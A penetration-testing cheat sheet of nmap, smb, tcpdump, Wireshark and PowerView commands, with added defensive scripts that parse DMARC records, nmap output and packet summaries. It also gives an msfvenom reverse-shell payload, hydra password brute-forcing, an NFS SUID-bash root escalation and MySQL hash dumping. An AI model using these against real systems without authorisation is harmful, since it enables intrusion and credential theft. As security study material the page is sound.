# Pentest - Commands and Tools

## Basic network commands

```bash
ping <IP or domain>
traceroute <IP or domain>     # Linux; -I sends ICMP probes (UDP by default)
tracert <IP or domain>        # Windows
whois <domain>                # Linux; install with: sudo apt update && sudo apt-get install whois
dig <domain> @<dns-server-ip>
telnet <ip> <port>
```

dig also gives us the TTL (Time To Live) of the queried DNS record. When your computer queries a domain name it stores the result in its local cache; the TTL of the record tells your computer when to stop considering the cached record valid.

Google DNS: 8.8.8.8 or 8.8.4.4

## dig

Check DMARC record

```bash
dig _dmarc.<yourdomain> TXT +short
```

## ssh

```bash
ssh username@hostname -i /pathto/id_rsa   # id_rsa = private key
```

## smb

```bash
smbclient //ip/share -U Anonymous -p port   # -p only needed for a non-default port (SMB default is 445)
```

enum4linux

```bash
enum4linux -a $ip | tee enum4linux-$ip.out
```

smbmap

```bash
while read i; do smbmap -H $i 2>/dev/null; done < <Target IP File> | grep -v Finding | grep -v Authentication
```

## nmap

General Scan

```bash
nmap -sV --script vuln -oN nmap-$ip.out $ip
```

* -sV: service/version scan
* --script vuln: run a script scan with the vuln scripts.
* -oN nmap-$ip.out: output in normal format to the file

```bash
nmap --script safe -p- -oN nmap-$ip.out $ip
```

* -p-: all ports
* --script safe: run a script scan with the safe scripts.
* -oN nmap-$ip.out: output in normal format to the file

```bash
nmap -A -p- -oN nmap-$ip.out $ip
```

* -p-: all ports
* -A: Enable OS detection, version detection, script scanning, and traceroute
* -oN nmap-$ip.out: output in normal format to the file

```bash
nmap -A -p- -Pn -oN nmap-$ip.out $ip
```

* -A: Enable OS detection, version detection, script scanning, and traceroute
* -p-: all ports
* -Pn: skip the Nmap host discovery stage (treat every host as up)
* -oN nmap-$ip.out: output in normal format to the file

## Windows

* lusrmgr.msc - Local User and Group Management

## tcpdump

https://danielmiessler.com/study/tcpdump/

use with sudo

```bash
tcpdump -i tun0 'ip proto \icmp'          # options such as -i must come before the filter expression
tcpdump -D                                 # show interfaces
tcpdump -i lo                              # select interface
tcpdump -i lo -XA                          # hexadecimal & ASCII
tcpdump -n -r file.pcap -A host X.X.X.X and port XXXX   # read a previous capture, (-n) do not resolve hostnames, filter by host and port, show payload as ASCII
tcpdump -w file.pcap                       # write the captured data to a file
tcpdump -n -r file.pcap ip6                # search for a specific protocol, e.g. IPv6
tcpdump -n -r file.pcap net 192.168.99.0/24   # search network ranges
```

## netcat

```bash
nc -l -p XXXX   # -l listening, -p port
```

```bash
nc IP port   # to connect
```

## telnet

```bash
telnet ip port
```

## msfvenom

### reverse shell for telnet on unix

```bash
msfvenom -p cmd/unix/reverse_netcat lhost=localIP lport=4444 R
```

* -p = payload
* lhost = our local host IP address (this is your machine's IP address)
* lport = the port to listen on (this is the port on your machine)
* R = export the payload in raw format

```bash
nc -lvp [listening port]
```

* -l: listen mode, for inbound connects
* -v: verbose
* -p: specify the local port (in our case, the port we are listening on)

## hydra

```bash
hydra -t 4 -l user -P /usr/share/wordlists/rockyou.txt -vV [IP] [protocol]
```

* -t 4: Number of parallel connections per target
* -l [user]: Points to the user whose account you're trying to compromise
* -P [path to dictionary]: Points to the file containing the list of possible passwords
* -vV: Sets verbose mode to very verbose, shows the login+pass combination for each attempt
* [IP]: The IP address of the target machine
* [protocol]: Sets the protocol, ex: ftp, ssh

## NFS

list the NFS shares

```bash
showmount -e IP
```

mount a share on our local machine: first create a temp dir

```bash
mkdir /tmp/mount
```

then

```bash
sudo mount -t nfs $IP:home /tmp/mount/ -o nolock
```

* mount: Execute the mount command
* -t nfs: Type of device to mount, then specifying that it's NFS
* IP:share: The IP Address of the NFS server, and the name of the share we wish to mount
* -o nolock: Specifies not to use NLM locking

Exploit NFS Share: Root Squashing disabled or misconfigured

* NFS Access ->
* Gain Low Privilege Shell ->
* Upload Bash Executable to the NFS share ->
* Set SUID Permissions Through NFS Due To Misconfigured Root Squash ->
* Login through SSH ->
* Execute SUID Bit Bash Executable ->
* ROOT ACCESS

Note: before copying -> the copied bash shell must be owned by the root user: `sudo chown root bash`
After copying -> `sudo chmod +sx bash`

## Metasploit

* `msfconsole`: start metasploit
* `search [module_name]`: search for a module
* `use [module_name]`: use a module
* `options`: display module options
* `set [variable]`: set a variable of the module
* `run`: run the module
* `info`: show info about the module

## MySQL

`sudo apt install default-mysql-client`

connect to the database

`mysql -h [IP] -u [username] -p`

enumerate users with nmap

`nmap --script mysql-enum [target]`

metasploit

* `auxiliary/admin/mysql/mysql_sql`: This module allows simple SQL statements to be executed against a MySQL instance given the appropriate credentials.
* `auxiliary/scanner/mysql/mysql_schemadump`: This module extracts the schema information from a MySQL DB server (dumps table/column names).
* `auxiliary/scanner/mysql/mysql_hashdump`: This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.
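The dig / DMARC check earlier on this page tells you what to run; what the record means is the defender's question. The following is an added example, not part of the original cheat sheet: it parses a `dig _dmarc.<domain> TXT` answer line, extracts the TTL described in the dig note, and classifies the DMARC `p=` policy. The domain and record are constructed for the example.

```bash
#!/usr/bin/env bash
# Added example: parse a `dig _dmarc.<domain> TXT` answer line, report the
# record's TTL and classify its DMARC policy. Not part of the original page.

# Constructed sample answer line (domain and values are made up); this is the
# shape of the ANSWER SECTION printed by `dig _dmarc.<domain> TXT`.
SAMPLE_ANSWER='_dmarc.example.test. 300 IN TXT "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.test"'

# record_ttl: the second column of a dig answer line is the TTL in seconds,
# i.e. how long a resolver may keep serving this record from its cache.
record_ttl() {
    printf '%s\n' "$1" | awk '{print $2}'
}

# dmarc_policy: print the p= tag of a DMARC record (accepts a full answer line
# or the bare `+short` output). Prints "missing" when there is no v=DMARC1
# record and "invalid" when the record has no p= tag (p is mandatory).
dmarc_policy() {
    local rec
    rec=$(printf '%s\n' "$1" | tr -d '"' | grep -i 'v=DMARC1' | head -n 1)
    if [ -z "$rec" ]; then
        echo missing
        return 0
    fi
    # split the record on ';', trim leading whitespace, then pick the p tag
    printf '%s\n' "$rec" | tr ';' '\n' | sed 's/^[[:space:]]*//' \
        | awk -F= 'tolower($1) == "p" { print tolower($2); found = 1 }
                   END { if (!found) print "invalid" }'
}

# dmarc_verdict: what the policy means for mail that spoofs the domain.
dmarc_verdict() {
    case "$(dmarc_policy "$1")" in
        reject|quarantine) echo enforcing ;;     # spoofed mail is rejected or quarantined
        none)              echo monitor-only ;;  # reports only; spoofed mail is still delivered
        missing)           echo no-dmarc ;;
        *)                 echo invalid ;;
    esac
}

main() {
    printf 'TTL: %s seconds\n' "$(record_ttl "$SAMPLE_ANSWER")"
    printf 'policy: %s (%s)\n' "$(dmarc_policy "$SAMPLE_ANSWER")" "$(dmarc_verdict "$SAMPLE_ANSWER")"
}
main
```

To use it on a real domain, replace `SAMPLE_ANSWER` with a line from `dig _dmarc.<yourdomain> TXT` (the `+short` form works too). A `none` policy means the domain only collects reports; only `quarantine` or `reject` actually stops spoofed mail.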
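For the nmap scans above, an added example (my own, not the page's; the scan text is constructed to look like `-oN` normal output and is not a real scan) that reduces a `nmap-$ip.out` file to its open ports and diffs them against an expected baseline, so an exposed service that should not be there stands out:

```bash
#!/usr/bin/env bash
# Added example: summarise an `nmap -sV -oN` normal-output file and diff the
# open ports against an expected baseline. Not part of the original page.

# Constructed scan output in nmap's normal (-oN) format; host, versions and
# timestamps are made up for this example.
NMAP_OUT=$(cat <<'EOF'
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV -oN nmap-10.0.0.5.out 10.0.0.5
Nmap scan report for 10.0.0.5
Host is up (0.0010s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE    SERVICE      VERSION
22/tcp   open     ssh          OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http         Apache httpd 2.4.52 ((Ubuntu))
445/tcp  filtered microsoft-ds
3306/tcp open     mysql        MySQL 8.0.35-0ubuntu0.22.04.1
# Nmap done at Mon Jan  1 00:00:10 2024 -- 1 IP address (1 host up) scanned in 10.00 seconds
EOF
)

# open_ports: read -oN output on stdin and print "port/proto service version"
# for every line whose STATE is open; closed and filtered ports are dropped.
open_ports() {
    awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        version = ""
        for (i = 4; i <= NF; i++) version = version (i > 4 ? " " : "") $i
        print $1, $3, version
    }'
}

# open_port_count: how many open ports the scan found.
open_port_count() {
    open_ports | wc -l | tr -d ' '
}

# unexpected_ports: open ports that are not in the space-separated baseline
# given as $1 (e.g. "22/tcp 80/tcp"); anything printed deserves a look.
unexpected_ports() {
    baseline=" $1 "
    open_ports | while read -r port service version; do
        case "$baseline" in
            *" $port "*) ;;   # expected, nothing to report
            *) printf '%s %s %s\n' "$port" "$service" "$version" ;;
        esac
    done
}

main() {
    echo "open ports:"
    printf '%s\n' "$NMAP_OUT" | open_ports
    echo "not in baseline (22/tcp 80/tcp):"
    printf '%s\n' "$NMAP_OUT" | unexpected_ports "22/tcp 80/tcp"
}
main
```

Feed it a real file with `open_ports < nmap-$ip.out`; keeping a baseline per host and running `unexpected_ports` after each scan turns the cheat-sheet command into a repeatable exposure check.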
## John the Ripper

```bash
john [file-with-hash]
```

## Wireshark

`apt install wireshark`

Filtering

* and - operator: and / &&
* or - operator: or / ||
* equals - operator: eq / ==
* not equal - operator: ne / !=
* greater than - operator: gt / >
* less than - operator: lt / <

```
ip.addr
ip.src
ip.dst
tcp.port eq [Port#]   or   [Protocol Name]
udp.port eq [Port#]   or   [Protocol Name]
```

### ARP packets

* Request (1): Opcode: request (1)
* Reply (2): Opcode: reply (2)

Filter

```
arp.opcode == 1
arp.opcode == 2
arp.src.hw_mac == <80:fb:06:f0:45:d7>
arp.dst.proto_ipv4            # to find the IP for a specific MAC
```

### ICMP Packets

* Type: 8 (Echo (ping) request) -> a type equal to 8 means it is a request packet
* Type: 0 (Echo (ping) reply) -> a type equal to 0 means it is a reply packet

:::warning
When these types or codes are altered or do not seem correct, that is typically a sign of suspicious activity. Also check the timestamp and the data string, which will typically just be random data.
:::

### TCP Packets

For TCP packets Wireshark can be very helpful: it colour-codes the packets by danger level. Check the sequence number and acknowledgment number. Within Wireshark we can also see the original (absolute) sequence number by navigating to Edit > Preferences > Protocols > TCP and unchecking "Relative sequence numbers".

:::info
Tools like RSA NetWitness and NetworkMiner can also be used to filter out packets.
:::

:::warning
Typically when this handshake is out of order or when it includes other packets like an RST packet, something suspicious or wrong is happening in the network.
:::

### DNS Packets

To analyze:

* what it is querying
* the answer to the query: can be used to verify the query

:::warning
Where the query is originating from: if it is UDP 53 the packet passes that check; if it was TCP 53 it should be considered suspicious traffic and needs to be analyzed further.
:::

### HTTP Traffic

* User-Agent
* Request URI
* File Data
* Host
* Response

:::info
Statistics > Protocol Hierarchy: organizes the protocols present in a capture (the Protocol Hierarchy)
Statistics > Endpoints: allows the user to organize all endpoints and IPs found within a specific capture
File > Export Objects > HTTP: allows us to organize all requested URIs in the capture
:::

### HTTPS Traffic

Before sending encrypted information the client and server need to agree upon various steps in order to make a secure tunnel.

1. Client and server agree on a protocol version
2. Client and server select a cryptographic algorithm
3. The client and server can authenticate to each other; this step is optional
4. Creates a secure tunnel with a public key

To view the unencrypted data in Wireshark, add the server's RSA private key under Edit > Preferences > Protocols > TLS > RSA keys list > [+]:

* IP Address: 127.0.0.1
* Port: start_tls
* Protocol: http
* Keyfile: RSA key location

This only decrypts sessions that used RSA key exchange; for (EC)DHE cipher suites and TLS 1.3 you need the session secrets (a key log file) instead of the server key.

## Powershell

Load a powershell shell with execution policy bypassed

```powershell
powershell -ep bypass
```

Execute a ps script

```powershell
./Script.ps1
```

Load a ps module in the current scope (dot-source it)

```powershell
. ./Script.ps1
```

## Active Directory Enumeration

PowerView

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview

Search a specific property

```powershell
Get-NetUser | ?{$_.property -match 'Domain Admins'}   # replace 'property' with the attribute to match, e.g. memberof
```

## SHODAN
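For the ARP, ICMP and DNS checks in the Wireshark sections above, an added example (not from the original page; the packet summary lines and their field layout are constructed for the example rather than real tshark output) that applies those rules with awk: DNS sent to port 53 over TCP, ICMP types other than echo request (8) and echo reply (0), and one IP answering ARP with more than one MAC.

```bash
#!/usr/bin/env bash
# Added example: apply the page's Wireshark sanity checks to a one-line-per-
# packet summary. Not part of the original page.

# Constructed packet summary (a made-up layout, such as you could produce with
# tshark -T fields or File > Export Packet Dissections). One packet per line:
#   DNS  <l4proto> <src> <dst> <dstport>
#   ICMP <src> <dst> <type>
#   ARP  <opcode-name> <sender-ip> <sender-mac>
PACKETS='DNS udp 10.0.0.5 10.0.0.53 53
DNS tcp 10.0.0.7 198.51.100.9 53
ICMP 10.0.0.5 10.0.0.1 8
ICMP 10.0.0.1 10.0.0.5 0
ICMP 10.0.0.9 10.0.0.5 13
ARP reply 10.0.0.1 aa:bb:cc:dd:ee:01
ARP reply 10.0.0.1 aa:bb:cc:dd:ee:ff
ARP reply 10.0.0.2 aa:bb:cc:dd:ee:02'

# dns_over_tcp: the page's DNS check; UDP 53 passes, TCP 53 gets a closer look.
dns_over_tcp() {
    awk '$1 == "DNS" && $2 == "tcp" && $5 == 53 { print "dns-over-tcp", $3, "->", $4 }'
}

# odd_icmp_types: ICMP whose type is neither echo request (8) nor echo reply (0),
# e.g. a timestamp request (13) or anything altered.
odd_icmp_types() {
    awk '$1 == "ICMP" && $4 != 8 && $4 != 0 { print "icmp-type-" $4, $2, "->", $3 }'
}

# arp_conflicts: sender IPs that appear in ARP replies with more than one MAC,
# the thing the arp.opcode == 2 / arp.src.hw_mac filters are used to spot.
arp_conflicts() {
    awk '$1 == "ARP" && $2 == "reply" {
            if (!seen[$3, $4]++) macs[$3] = macs[$3] (macs[$3] ? "," : "") $4
         }
         END { for (ip in macs) if (index(macs[ip], ",")) print "arp-conflict", ip, macs[ip] }'
}

# analyze: run every check over the summary on stdin, one finding per line.
analyze() {
    local input
    input=$(cat)
    printf '%s\n' "$input" | dns_over_tcp
    printf '%s\n' "$input" | odd_icmp_types
    printf '%s\n' "$input" | arp_conflicts
}

main() {
    printf '%s\n' "$PACKETS" | analyze
}
main
```

The checks only flag what the page says to look at; each finding is a prompt to open that conversation in Wireshark, not a verdict (DNS over TCP, for example, is also how large legitimate responses and zone transfers travel).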